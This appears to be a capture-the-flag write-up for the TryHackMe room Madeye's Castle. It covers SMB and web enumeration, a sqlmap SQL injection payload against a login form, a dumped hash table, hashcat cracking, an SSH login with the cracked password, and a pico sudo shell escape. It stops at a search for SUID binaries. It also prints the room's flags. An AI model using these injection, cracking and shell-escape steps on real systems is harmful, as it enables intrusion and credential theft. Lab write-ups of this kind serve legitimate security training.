TryHackMe-Madeye-s-Castle

From aldeid
Jump to navigation Jump to search

A boot2root box that is modified from a box used in CuCTF by the team at Runcode.ninja

Have fun storming Madeye’s Castle! In this room you will need to fully enumerate the system, gain a foothold, and then pivot around to a few different users.

User1.txt

Hint: Find the different user. Keep enumerating.

Footprint

Nmap detects a Samba network share, SSH and a web port, all services running on their standard ports:

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:5f:48:fa:3d:3e:e6:9c:23:94:33:d1:8d:22:b4:7a (RSA)
|   256 53:75:a7:4a:a8:aa:46:66:6a:12:8c:cd:c2:6f:39:aa (ECDSA)
|_  256 7f:c2:2f:3d:64:d9:0a:50:74:60:36:03:98:00:75:98 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: Amazingly It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: HOGWARTZ-CASTLE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: HOGWARTZ-CASTLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: hogwartz-castle
|   NetBIOS computer name: HOGWARTZ-CASTLE\x00
|   Domain name: \x00
|   FQDN: hogwartz-castle
|_  System time: 2021-05-07T17:52:11+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-07T17:52:11
|_  start_date: N/A

Samba

Let’s start with the Samba network share. Enumerating the network shares without authentication reveals a network share (sambashare):

┌──(kali㉿kali)-[/data/Madeye_s_Castle]
└─$ smbclient -L 10.10.227.45
Enter WORKGROUP\kali's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    sambashare      Disk      Harry's Important Files
    IPC$            IPC       IPC Service (hogwartz-castle server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

Connecting to this network share shows 2 files:

┌──(kali㉿kali)-[/data/Madeye_s_Castle]
└─$ smbclient //10.10.227.45/sambashare  
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 02:19:20 2020
  ..                                  D        0  Thu Nov 26 01:57:55 2020
  spellnames.txt                      N      874  Thu Nov 26 02:06:32 2020
  .notes.txt                          H      147  Thu Nov 26 02:19:19 2020

        9219412 blocks of size 1024. 4411812 blocks available
smb: \> get .notes.txt -
Hagrid told me that spells names are not good since they will not "rock you"
Hermonine loves historical text editors along with reading old books.
getting file \.notes.txt of size 147 as - (0.7 KiloBytes/sec) (average 1.9 KiloBytes/sec)
smb: \> get spellnames.txt -
avadakedavra
crucio
imperio
morsmordre
brackiumemendo
confringo

[REDACTED]

accio
anapneo
incendio
evanesco
aguamenti
getting file \spellnames.txt of size 874 as - (4.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)

We are provided with 2 potential usernames (hagrid and hermonine) and a password list (spellnames.txt). Let’s save the 2 users in a usernames.txt file.

$ cat > usernames.txt << EOF
hagrid
hermonine
EOF

Web

Virtual host

Analyzing the source code of the main page reveals a virtual host (hogwartz-castle.thm):

┌──(kali㉿kali)-[/data/Madeye_s_Castle/files]
└─$ curl -s http://10.10.227.45/ | head        

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
        TODO: Virtual hosting is good. 
        TODO: Register for hogwartz-castle.thm
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Apache2 Ubuntu Default Page: Amazingly It works</title>

Let’s add this virtual host to our /etc/hosts file:

echo "10.10.227.45 hogwartz-castle.thm" | sudo tee -a /etc/hosts

Browsing this virtual host in a browser shows a page with an authentication. I tried to brute force it with the files gathered so far but it failed.

┌──(kali㉿kali)-[/data/Madeye_s_Castle/files]
└─$ hydra -L usernames.txt -P spellnames.txt hogwartz-castle.thm http-post-form "/login:user=^USER^&password=^PASS^:Incorrect Username or Password"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-07 20:19:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 162 login tries (l:2/p:81), ~11 tries per task
[DATA] attacking http-post-form://hogwartz-castle.thm:80/login:user=^USER^&password=^PASS^:Incorrect Username or Password
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-07 20:19:30

Main website

Further enumerating the main website reveals that there is a /backup location:

┌──(kali㉿kali)-[/data/Madeye_s_Castle/files]
└─$ gobuster dir -u http://10.10.227.45 -x php,txt,bak,old,zip,tar -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.227.45
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,txt,bak,old,zip,tar
[+] Timeout:                 10s
===============================================================
2021/05/07 20:33:24 Starting gobuster in directory enumeration mode
===============================================================
/.hta.tar             (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.hta.txt             (Status: 403) [Size: 277]
/.hta.bak             (Status: 403) [Size: 277]
/.hta.old             (Status: 403) [Size: 277]
/.hta.zip             (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htpasswd.tar        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/.htpasswd.bak        (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.old        (Status: 403) [Size: 277]
/.htaccess.txt        (Status: 403) [Size: 277]
/.htpasswd.zip        (Status: 403) [Size: 277]
/.htaccess.bak        (Status: 403) [Size: 277]
/.htaccess.old        (Status: 403) [Size: 277]
/.htaccess.zip        (Status: 403) [Size: 277]
/.htaccess.tar        (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/backup               (Status: 301) [Size: 313] [--> http://10.10.227.45/backup/]
/index.html           (Status: 200) [Size: 10965]                                
/server-status        (Status: 403) [Size: 277]                                  
                                                                                 
===============================================================
2021/05/07 20:37:42 Finished
===============================================================

Email file

Enumerating the location reveals an email file:

┌──(kali㉿kali)-[/data/Madeye_s_Castle/files]
└─$ gobuster dir -u http://10.10.227.45/backup/ -x php,txt,bak,old,zip,tar -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.227.45/backup/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              tar,php,txt,bak,old,zip
[+] Timeout:                 10s
===============================================================
2021/05/07 20:38:20 Starting gobuster in directory enumeration mode
===============================================================
/.hta.bak             (Status: 403) [Size: 277]
/.hta.old             (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/.hta.zip             (Status: 403) [Size: 277]
/.hta.tar             (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.hta.txt             (Status: 403) [Size: 277]
/.htaccess.zip        (Status: 403) [Size: 277]
/.htpasswd.bak        (Status: 403) [Size: 277]
/.htaccess.tar        (Status: 403) [Size: 277]
/.htpasswd.old        (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.zip        (Status: 403) [Size: 277]
/.htpasswd.tar        (Status: 403) [Size: 277]
/.htaccess.txt        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htaccess.bak        (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/.htaccess.old        (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/email                (Status: 200) [Size: 1527]
                                                
===============================================================
2021/05/07 20:43:51 Finished
===============================================================

Below is the content of the email:

┌──(kali㉿kali)-[/data/Madeye_s_Castle/files]
└─$ curl -s http://10.10.227.45/backup/email   
Madeye,

It is done. I registered the name you requested below but changed the "s" to a "z". You should be good to go.

RME

--------
On Tue, Nov 24, 2020 at 8:54 AM Madeye Moody <[email protected]> wrote:
Mr. Roar M. Echo,

Sounds great! Thanks, your mentorship is exactly what we need to avoid legal troubles with the Ministry of Magic.

Magically Yours,
madeye

--------
On Tue, Nov 24, 2020 at 8:53 AM Roar May Echo <[email protected]> wrote:
Madeye,

I don't think we can do "hogwarts" due to copyright issues, but let’s go with "hogwartz", how does that sound?

Roar

--------
On Tue, Nov 24, 2020 at 8:52 AM Madeye Moody <[email protected]> wrote:
Dear Mr. Echo,

Thanks so much for helping me develop my castle for TryHackMe. I think it would be great to register the domain name of "hogwarts-castle.thm" for the box. I have been reading about virtual hosting in Apache and it's a great way to host multiple domains on the same server. The docs says that...

> The term Virtual Host refers to the practice of running more than one web site (such as 
> company1.example.com and company2.example.com) on a single machine. Virtual hosts can be 
> "IP-based", meaning that you have a different IP address for every web site, or "name-based", 
> meaning that you have multiple names running on each IP address. The fact that they are 
> running on the same physical server is not apparent to the end user.

You can read more here: https://httpd.apache.org/docs/2.4/vhosts/index.html

What do you think?

Thanks,
madeye

Not very helpful as we are already aware of the virtual host.

SQL injection

After attempting to brute force the authentication page with rockyou.txt during hours without success, I aborted the process and attempted an SQL injection.

SQLMap detected that the backend was SQLite and was able to dump the content of the database:

┌──(kali㉿kali)-[/data/Madeye_s_Castle/files]
└─$ sqlmap -r login.xml --risk=3 --level=5 --dump-all --threads 5
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.4#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:04:02 /2021-05-07/

[21:04:02] [INFO] parsing HTTP request from 'login.xml'
[21:04:02] [INFO] resuming back-end DBMS 'sqlite' 
[21:04:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: user=-9207' OR 5441=5441-- qrTF&password=password
---
[21:04:02] [INFO] the back-end DBMS is SQLite


[REDACTED]


Database: <current>
Table: users
[40 entries]
+------------------+-------+-------------------------------------------------------------------+----------------------------------------------------------------------------------------------------------------------------------+
| name             | admin | notes                                                             | password                                                                                                                         |
+------------------+-------+-------------------------------------------------------------------+----------------------------------------------------------------------------------------------------------------------------------+
| Lucas Washington | 0     | contact administrator. Congrats on SQL injection... keep digging  | c53d7af1bbe101a6b45a3844c89c8c06d8ac24ed562f01b848cad9925c691e6f10217b6594532b9cd31aa5762d85df642530152d9adb3005fac407e2896bf492 |
| Harry Turner     | 0     | My linux username is my first name, and password uses best64      | b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885 |
| Andrea Phillips  | 0     |  contact administrator. Congrats on SQL injection... keep digging | e1ed732e4aa925f0bf125ae8ed17dd2d5a1487f9ff97df63523aa481072b0b5ab7e85713c07e37d9f0c6f8b1840390fc713a4350943e7409a8541f15466d8b54 |
| Liam Hernandez   | 0     | contact administrator. Congrats on SQL injection... keep digging  | 5628255048e956c9659ed4577ad15b4be4177ce9146e2a51bd6e1983ac3d5c0e451a0372407c1c7f70402c3357fc9509c24f44206987b1a31d43124f09641a8d |
| Adam Jenkins     | 0     | contact administrator. Congrats on SQL injection... keep digging  | 2317e58537e9001429caf47366532d63e4e37ecd363392a80e187771929e302922c4f9d369eda97ab7e798527f7626032c3f0c3fd19e0070168ac2a82c953f7b |
| Landon Alexander | 0     | contact administrator. Congrats on SQL injection... keep digging  | 79d9a8bef57568364cc6b4743f8c017c2dfd8fd6d450d9045ad640ab9815f18a69a4d2418a7998b4208d509d8e8e728c654c429095c16583cbf8660b02689905 |
| Kennedy Anderson | 0     |  contact administrator. Congrats on SQL injection... keep digging | e3c663d68c647e37c7170a45214caab9ca9a7d77b1a524c3b85cdaeaa68b2b5e740357de2508142bc915d7a16b97012925c221950fb671dd513848e33c33d22e |
| Sydney Wright    | 0     |  contact administrator. Congrats on SQL injection... keep digging | d3ccca898369a3f4cf73cbfc8daeeb08346edf688dc9b7b859e435fe36021a6845a75e4eddc7a932e38332f66524bd7876c0c613f620b2030ed2f89965823744 |
| Aaliyah Sanders  | 0     |  contact administrator. Congrats on SQL injection... keep digging | dc2a6b9462945b76f333e075be0bc2a9c87407a3577f43ba347043775a0f4b5c1a78026b420a1bf7da84f275606679e17ddc26bceae25dad65ac79645d2573c0 |
| Olivia Murphy    | 0     |  contact administrator. Congrats on SQL injection... keep digging | 6535ee9d2b8d6f2438cf92da5a00724bd2539922c83ca19befedbe57859ceafd6d7b9db83bd83c26a1e070725f6f336e21cb40295ee07d87357c34b6774dd918 |
| Olivia Ross      | 0     |  contact administrator. Congrats on SQL injection... keep digging | 93b4f8ce01b44dd25c134d0517a496595b0b081cef6eb625e7eb6662cb12dd69c6437af2ed3a5972be8b05cc14a16f46b5d11f9e27e6550911ed3d0fe656e04d |
| Grace Brooks     | 0     |  contact administrator. Congrats on SQL injection... keep digging | 9a311251255c890692dc84b7d7d66a1eefc5b89804cb74d16ff486927014d97502b2f790fbd7966d19e4fbb03b5eb7565afc9417992fc0c242870ea2fd863d6d |
| Jordan White     | 0     | contact administrator. Congrats on SQL injection... keep digging  | 5ed63206a19b036f32851def04e90b8df081071aa8ca9fb35ef71e4daf5e6c6eab3b3fea1b6e50a45a46a7aee86e4327f73a00f48deb8ae2bf752f051563cc8b |
| Diego Baker      | 0     | contact administrator. Congrats on SQL injection... keep digging  | 87ac9f90f01b4b2ae775a7cb96a8a04d7ab7530282fd76224ee03eecab9114275540e4b6a2c52e890cf11f62aacb965be0c53c48c0e51bf731d046c5c3182aad |
| Liam Ward        | 0     | contact administrator. Congrats on SQL injection... keep digging  | 88344d6b7724bc0e6e3247d4912fa755a5a91c2276e08610462f6ea005d16fd5e305dfe566e7f1dd1a98afe1abfa38df3d9697cdc47ecbb26ac4d21349d09ba7 |
| Carlos Barnes    | 0     | contact administrator. Congrats on SQL injection... keep digging  | 7f67af71e8cbb7188dd187b7da2386cc800ab8b863c9d0b2dce87c98a91b5511330a2ad4f7d73592b50a2a26c26970cfbd22f915d1967cd92569dbf5e24ac77e |
| Carlos Lopez     | 0     | contact administrator. Congrats on SQL injection... keep digging  | 8c8702dbb6de9829bcd6da8a47ab26308e9db7cb274b354e242a9811390462a51345f5101d7f081d36eea4ec199470162775c32cb1f4a96351dc385711619671 |
| Oliver Gonzalez  | 0     | contact administrator. Congrats on SQL injection... keep digging  | c809b40b7c3c0f095390f3cd96bb13864b7e8fd1670c6b1c05b1e26151be62782b97391b120cb4a8ee1d0c9b8fffaf12b44c9d084ae6041468ad5f12ec3d7a4e |
| Sophie Sanchez   | 0     |  contact administrator. Congrats on SQL injection... keep digging | 68b519187b9e2552d555cb3e9183711b939f94dfe2f71bda0172ee8402acf074cc0f000611d68d2b8e9502fa7235c8a25d72da50916ad0689e00cb4f47283e9b |
| Maya Sanders     | 0     |  contact administrator. Congrats on SQL injection... keep digging | 7eea93d53fbed3ba8f2fa3d25c5f16fe5eaff1f5371918e0845d2076a2e952a457390ad87d289bf25f9457032f14bb07dcd625d03f2f5ee5c887c09dc7107a66 |
| Joshua Reed      | 0     | contact administrator. Congrats on SQL injection... keep digging  | e49608634f7de91d19e5e1b906e10c5a4a855a4fe32521f310727c9875e823c82b3e0347b32ef49ea44657e60e771d9e326d40ab60ce3a950145f1a7a79d3124 |
| Aaliyah Allen    | 0     |  contact administrator. Congrats on SQL injection... keep digging | c063c5215b56091327a1f25e38e2d0a5e6db83cceb0ab29cbb0bedd686c18ee5770bfbbfa0a4ac542c8935b0fb63e30ea0bc0408d3523157d840fdfa54ec8dab |
| Jasmine King     | 0     |  contact administrator. Congrats on SQL injection... keep digging | 487daab566431e86172ed68f0836f3221592f91c94059a725d2fdca145f97e6258593929c37d0339ca68614a52f4df61953b930585c4968cedaaa836744c52a6 |
| Jonathan Long    | 0     | contact administrator. Congrats on SQL injection... keep digging  | 44b1fbcbcd576b8fd69bf2118a0c2b82ccf8a6a9ef2ae56e8978e6178e55b61d491f6fc152d07f97ca88c6b7532f25b8cd46279e8a2c915550d9176f19245798 |
| Samuel Anderson  | 0     | contact administrator. Congrats on SQL injection... keep digging  | a86fa315ce8ed4d8295bf6d0139f23ba80e918a54a132e214c92c76768f27ce002253834190412e33c9af4ea76befa066d5bdeb47363f228c509b812dc5d81df |
| Julian Robinson  | 0     | contact administrator. Congrats on SQL injection... keep digging  | a1f6e38be4bf9fd307efe4fe05522b8c3a9e37fc2c2930507e48cb5582d81f73814ffb543cef77b4b24a18e70e2670668d1a5b6e0b4cb34af9706890bd06bbc9 |
| Gianna Harris    | 0     |  contact administrator. Congrats on SQL injection... keep digging | 01529ec5cb2c6b0300ed8f4f3df6b282c1a68c45ff97c33d52007573774014d3f01a293a06b1f0f3eb6e90994cb2a7528d345a266203ef4cd3d9434a3a033ec0 |
| Madelyn Morgan   | 0     |  contact administrator. Congrats on SQL injection... keep digging | d17604dbb5c92b99fe38648bbe4e0a0780f2f4155d58e7d6eddd38d6eceb62ae81e5e31a0a2105de30ba5504ea9c75175a79ed23cd18abcef0c8317ba693b953 |
| Ella Garcia      | 0     |  contact administrator. Congrats on SQL injection... keep digging | ac67187c4d7e887cbaccc625209a8f7423cb4ad938ec8f50c0aa5002e02507c03930f02fab7fab971fb3f659a03cd224669b0e1d5b5a9098b2def90082dfdbd2 |
| Zoey Gonzales    | 0     |  contact administrator. Congrats on SQL injection... keep digging | 134d4410417fb1fc4bcd49abf4133b6de691de1ef0a4cdc3895581c6ad19a93737cd63cb8d177db90bd3c16e41ca04c85d778841e1206193edfebd4d6f028cdb |
| Abigail Morgan   | 0     |  contact administrator. Congrats on SQL injection... keep digging | afcaf504e02b57f9b904d93ee9c1d2e563d109e1479409d96aa064e8fa1b8ef11c92bae56ddb54972e918e04c942bb3474222f041f80b189aa0efd22f372e802 |
| Joseph Rivera    | 0     | contact administrator. Congrats on SQL injection... keep digging  | 6487592ed88c043e36f6ace6c8b6c59c13e0004f9751b0c3fdf796b1965c48607ac3cc4256cc0708e77eca8e2df35b668f5844200334300a17826c033b03fe29 |
| Elizabeth Cook   | 0     |  contact administrator. Congrats on SQL injection... keep digging | af9f594822f37da8ed0de005b940158a0837060d3300be014fe4a12420a09d5ff98883d8502a2aaffd64b05c7b5a39cdeb5c57e3005c3d7e9cadb8bb3ad39ddb |
| Parker Cox       | 0     | contact administrator. Congrats on SQL injection... keep digging  | 53e7ea6c54bea76f1d905889fbc732d04fa5d7650497d5a27acc7f754e69768078c246a160a3a16c795ab71d4b565cde8fdfbe034a400841c7d6a37bdf1dab0d |
| Savannah Torres  | 0     |  contact administrator. Congrats on SQL injection... keep digging | 11f9cd36ed06f0c166ec34ab06ab47f570a4ec3f69af98a3bb145589e4a221d11a09c785d8d3947490ae4cd6f5b5dc4eb730e4faeca2e1cf9990e35d4b136490 |
| Aaliyah Williams | 0     |  contact administrator. Congrats on SQL injection... keep digging | 9dc90274aef30d1c017a6dc1d5e3c07c8dd6ae964bcfb95cadc0e75ca5927faa4d72eb01836b613916aea2165430fc7592b5abb19b0d0b2476f7082bfa6fb760 |
| Blake Washington | 0     | contact administrator. Congrats on SQL injection... keep digging  | 4c968fc8f5b72fd21b50680dcddea130862c8a43721d8d605723778b836bcbbc0672d20a22874af855e113cba8878672b7e6d4fc8bf9e11bc59d5dd73eb9d10e |
| Claire Miller    | 0     |  contact administrator. Congrats on SQL injection... keep digging | d4d5f4384c9034cd2c77a6bee5b17a732f028b2a4c00344c220fc0022a1efc0195018ca054772246a8d505617d2e5ed141401a1f32b804d15389b62496b60f24 |
| Brody Stewart    | 0     | contact administrator. Congrats on SQL injection... keep digging  | 36e2de7756026a8fc9989ac7b23cc6f3996595598c9696cca772f31a065830511ac3699bdfa1355419e07fd7889a32bf5cf72d6b73c571aac60a6287d0ab8c36 |
| Kimberly Murphy  | 0     |  contact administrator. Congrats on SQL injection... keep digging | 8f45b6396c0d993a8edc2c71c004a91404adc8e226d0ccf600bf2c78d33ca60ef5439ccbb9178da5f9f0cfd66f8404e7ccacbf9bdf32db5dae5dde2933ca60e6 |
+------------------+-------+-------------------------------------------------------------------+----------------------------------------------------------------------------------------------------------------------------------+

[22:35:59] [INFO] table 'SQLite_masterdb.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/hogwartz-castle.thm/dump/SQLite_masterdb/users.csv'
[22:35:59] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 27584 times
[22:35:59] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/hogwartz-castle.thm'

[*] ending @ 22:35:59 /2021-05-07/

All notes are the same, but for 1 user:

| Harry Turner     | 0     | My linux username is my first name, and password uses best64      | b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885 |

Crack harry’s password

Searching for best64 on the Internet led me to this link.

Save the SH512 string to hash.txt and crack it using the best64.rule in hashcat:

┌──(kali㉿kali)-[/data/Madeye_s_Castle/files]
└─$ hashcat -m 1700 -a 0 hash.txt -r /usr/share/hashcat/rules/best64.rule /usr/share/wordlists/rockyou.txt                                          1 ⨯
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-4800MQ CPU @ 2.70GHz, 2861/2925 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
* Uses-64-Bit

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 1104517645
* Runtime...: 2 secs

b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885:wingardiumleviosa123
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA2-512
Hash.Target......: b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd6...c5c885
Time.Started.....: Fri May  7 23:02:48 2021 (8 secs)
Time.Estimated...: Fri May  7 23:02:56 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5014.4 kH/s (7.59ms) @ Accel:256 Loops:77 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 43642368/1104517645 (3.95%)
Rejected.........: 0/43642368 (0.00%)
Restore.Point....: 566272/14344385 (3.95%)
Restore.Sub.#1...: Salt:0 Amplifier:0-77 Iteration:0-77
Candidates.#1....: wolfs1 -> w7w7w7

Started: Fri May  7 23:02:08 2021
Stopped: Fri May  7 23:02:58 2021

The username was the first name (harry) and the password is wingardiumleviosa123

Connect as harry

┌──(kali㉿kali)-[/data/Madeye_s_Castle/files]
└─$ ssh [email protected]
The authenticity of host '10.10.227.45 (10.10.227.45)' can't be established.
ECDSA key fingerprint is SHA256:tqvs4QmNV2BNfZVq42KFIsFtERVf7F4W5ziragiTf/0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.227.45' (ECDSA) to the list of known hosts.
[email protected]'s password: 
 _      __    __                     __         __ __                          __
 | | /| / /__ / /______  __ _  ___   / /____    / // /__  ___ __    _____ _____/ /____
 | |/ |/ / -_) / __/ _ \/  ' \/ -_) / __/ _ \  / _  / _ \/ _ `/ |/|/ / _ `/ __/ __/_ /
 |__/|__/\__/_/\__/\___/_/_/_/\__/  \__/\___/ /_//_/\___/\_, /|__,__/\_,_/_/  \__//__/
                                                        /___/

Last login: Thu Nov 26 01:42:18 2020
harry@hogwartz-castle:~$ ll
total 32
drwxr-x--- 4 harry harry 4096 Nov 26 01:28 ./
drwxr-xr-x 4 root  root  4096 Nov 26 01:50 ../
lrwxrwxrwx 1 root  root     9 Nov 26 01:06 .bash_history -> /dev/null
-rw-r----- 1 harry harry  220 Apr  4  2018 .bash_logout
-rw-r----- 1 harry harry 3771 Apr  4  2018 .bashrc
drwx------ 2 harry harry 4096 Nov 26 01:17 .cache/
drwx------ 3 harry harry 4096 Nov 26 01:17 .gnupg/
-rw-r----- 1 harry harry  807 Apr  4  2018 .profile
-rw-r----- 1 harry harry   40 Nov 26 01:06 user1.txt
harry@hogwartz-castle:~$ cat user1.txt 
RME{th3-b0Y-wHo-l1v3d-f409da6f55037fdc}

User flag: RME{th3-b0Y-wHo-l1v3d-f409da6f55037fdc}

User2.txt

Hint: She is a know it all and wants you to share her love for the metric system

Lateral move (harry -> hermonine)

Harry can run pico as hermonine:

harry@hogwartz-castle:~$ sudo -l
[sudo] password for harry: 
Matching Defaults entries for harry on hogwartz-castle:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User harry may run the following commands on hogwartz-castle:
    (hermonine) /usr/bin/pico
    (hermonine) /usr/bin/pico

Checking on GTFOBins reveals that we can run a shell with pico to move laterally to hermonine:

harry@hogwartz-castle:~$ sudo -u hermonine pico
^R^X
reset; bash 1>&0 2>&0

User flag #2

Now connected as hermonine and get the user flag.

hermonine@hogwartz-castle:~$ id
uid=1002(hermonine) gid=1002(hermonine) groups=1002(hermonine)
hermonine@hogwartz-castle:/home/hermonine$ cat user2.txt
RME{p1c0-iZ-oLd-sk00l-nANo-64e977c63cb574e6}

At this stage, it may be a good idea to add your SSH public key to /home/hermonine/.ssh/authorized_keys to connect as hermonine directly against SSH.

Root.txt

Hint: Time is tricky. Can you trick time.

The swagger binary

Checking files owned by root with the SUID bit set reveals an interesting binary:

hermonine@hogwartz-castle:~$ find / -type f -user root -perm -u=s -exec ls -l {} + 2>/dev/null
-rwsr-xr-x 1 root root        30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root        43088 Sep 16  2020 /bin/mount
-rwsr-xr-x 1 root root        64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root        44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root        26696 Sep 16  2020 /bin/umount
-rwsr-xr-x 1 root root         8816 Nov 26 01:06 /srv/time-turner/swagger <------------- interesting
-rwsr-xr-x 1 root root        76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root        44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root        75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        37136 Mar 22  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root        40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root        37136 Mar 22  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root        59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root        22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root       149080 Sep 23  2020 /usr/bin/sudo
-rwsr-xr-x 1 root root        18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-- 1 root messagebus  42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
